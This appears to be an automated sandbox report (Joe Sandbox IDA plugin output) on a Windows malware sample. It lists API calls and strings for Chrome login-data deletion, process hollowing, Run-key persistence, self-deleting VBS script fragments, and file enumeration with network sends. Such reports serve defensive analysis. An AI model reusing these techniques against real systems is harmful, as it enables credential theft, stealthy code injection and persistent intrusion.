                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
                                  • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                • String ID:
                                • API String ID: 2435342581-0
                                • Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.4 Pro$override$pth_unenc
                                • API String ID: 2281282204-930821335
                                • Opcode ID: dc16a9e0874cea99cd6dbe969c2e4899a966a5c348296f3374b49b5e23af8a6f
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: dc16a9e0874cea99cd6dbe969c2e4899a966a5c348296f3374b49b5e23af8a6f
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                • Opcode ID: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2616068718
                                • Opcode ID: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 146091e80e50a3233eb3da91dc212e53ef431cc0dfb42efe393cf7564aaa5dfb
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 146091e80e50a3233eb3da91dc212e53ef431cc0dfb42efe393cf7564aaa5dfb
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Uniqueness

                                Uniqueness Score: -1.00%
